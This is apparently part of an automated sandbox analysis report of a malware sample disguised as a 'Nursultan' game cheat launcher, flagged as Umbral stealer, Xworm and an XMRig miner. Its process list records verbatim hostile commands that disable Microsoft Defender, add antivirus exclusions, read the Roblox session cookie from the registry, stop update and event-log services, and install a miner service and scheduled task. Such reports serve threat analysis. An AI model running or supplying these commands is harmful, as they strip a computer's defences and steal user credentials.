memory/1880-54-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-52-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1880-51-0x0000000000400000-0x0000000000412000-memory.dmp
memory/1856-49-0x0000000005A20000-0x0000000005AD6000-memory.dmp
memory/1752-68-0x0000000001D30000-0x0000000001D38000-memory.dmp
memory/1752-67-0x000000001B6D0000-0x000000001B9B2000-memory.dmp
memory/1584-74-0x000000001B620000-0x000000001B902000-memory.dmp
memory/1584-75-0x0000000001DF0000-0x0000000001DF8000-memory.dmp
memory/476-94-0x0000000001E90000-0x0000000001E98000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 4a5887281298574ed5243753fd6f3d15 |
| SHA1 | be4f930dc2b31fece3e8b5afdbdeca328e7d1439 |
| SHA256 | 40a090399f5e0b09f05f55a694ec2c35b6786dd261dfd4e2d8b1d8650f25a0c3 |
| SHA512 | 76945f3617e6b63ae39cc1a4e5be75dff0cad15b33d3d4ac7c5d7fb15c3d80e62d391a3ddea00eed629ae1cf2fb7cad032248d5b1ba0b28fbfb027ecd43defb9 |
memory/2988-108-0x0000000002790000-0x0000000002798000-memory.dmp
memory/2988-107-0x000000001B6C0000-0x000000001B9A2000-memory.dmp
\Users\Admin\AppData\Roaming\svchost.exe
| MD5 | 9af17c8393f0970ee5136bd3ffa27001 |
| SHA1 | 4b285b72c1a11285a25f31f2597e090da6bbc049 |
| SHA256 | 71d6a7a3fe5f8dc878cd5bdeca0e09177efb85c01e9a8a10a95262cabefaa019 |
| SHA512 | b90f7de7d5ce72dccb264c7ba609e173c529b9d99ed9a63f88632bc58b1a994bbb727365f519c73b979f8918bd6de3c39a9f0347eb3a4bccdce4b2772a6516a3 |
memory/3032-138-0x0000000001D40000-0x0000000001D48000-memory.dmp
memory/3032-137-0x000000001B580000-0x000000001B862000-memory.dmp
memory/2292-144-0x0000000019F60000-0x000000001A242000-memory.dmp
memory/2292-145-0x0000000000A20000-0x0000000000A28000-memory.dmp
memory/2444-157-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-166-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-167-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-165-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-163-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-164-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-161-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-162-0x00000000001B0000-0x00000000001D0000-memory.dmp
memory/2444-160-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-159-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-155-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-158-0x0000000140000000-0x0000000140848000-memory.dmp
memory/2444-156-0x0000000140000000-0x0000000140848000-memory.dmp
memory/1656-153-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-149-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-148-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-147-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-146-0x0000000140000000-0x000000014000E000-memory.dmp
memory/1656-150-0x0000000140000000-0x000000014000E000-memory.dmp
memory/2976-170-0x0000000000C70000-0x0000000000CB0000-memory.dmp
memory/2616-173-0x0000000000FA0000-0x0000000000FE0000-memory.dmp
memory/2444-174-0x0000000140000000-0x0000000140848000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-01 02:04
Reported
2024-07-01 02:06
Platform
win10v2004-20240611-en
Max time kernel
13s
Max time network
153s
Command Line
Signatures
Detect Umbral payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Umbral
Xworm
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe | N/A |
Stops running service(s)
.NET Reactor protector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Nursultan.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" | C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\ = "URL:Run game 1199748644409184347 protocol" | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\URL Protocol | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347 | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe" | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2447855248-390457009-3660902674-1000_Classes\discord-1199748644409184347\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CrackLauncher.exe" | C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe
"C:\Users\Admin\AppData\Local\Temp\87fdd3337325634e35611a0cf9a9a4de31d4630dada6eeea83f261be5fbcaa95.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
"C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
"C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "XMRKNZQC"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "XMRKNZQC" binpath= "C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "XMRKNZQC"
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe
svchost.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
Network
Files